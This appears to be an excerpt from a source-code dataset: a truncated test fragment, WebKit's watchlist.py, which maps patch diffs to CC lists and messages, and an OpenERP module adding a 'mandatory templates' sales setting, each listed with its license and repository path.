reporter._find_in_archive("foo/bar-diffs.txt", MockZipFile()) # This is not ideal, but its reporter._find_in_archive("txt", MockZipFile())
bsd-3-clause
rishilification/phantomjs
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/watchlist/watchlist.py
132
3393
# Copyright (C) 2011 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from webkitpy.common.checkout.diff_parser import DiffParser class WatchList(object): def __init__(self): self.definitions = {} self.cc_rules = set() self.message_rules = set() def find_matching_definitions(self, diff): matching_definitions = set() patch_files = DiffParser(diff.splitlines()).files for path, diff_file in patch_files.iteritems(): for definition in self.definitions: # If a definition has already matched, there is no need to process it. if definition in matching_definitions: continue # See if the definition matches within one file. for pattern in self.definitions[definition]: if not pattern.match(path, diff_file.lines): break else: matching_definitions.add(definition) return matching_definitions def _determine_instructions(self, matching_definitions, rules): instructions = set() for rule in rules: if rule.match(matching_definitions): instructions.update(rule.instructions()) # Sort the results to make the order deterministic (for consistency and easier testing). return sorted(instructions) def determine_cc_list(self, matching_definitions): return self._determine_instructions(matching_definitions, self.cc_rules) def determine_messages(self, matching_definitions): return self._determine_instructions(matching_definitions, self.message_rules) def determine_cc_and_messages(self, diff): definitions = self.find_matching_definitions(diff) return { 'cc_list': self.determine_cc_list(definitions), 'messages': self.determine_messages(definitions), }
bsd-3-clause
arthru/OpenUpgrade
addons/account_analytic_analysis/res_config.py
426
1408
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Business Applications # Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv class sale_configuration(osv.osv_memory): _inherit = 'sale.config.settings' _columns = { 'group_template_required': fields.boolean("Mandatory use of templates.", implied_group='account_analytic_analysis.group_template_required', help="Allows you to set the template field as required when creating an analytic account or a contract."), }
agpl-3.0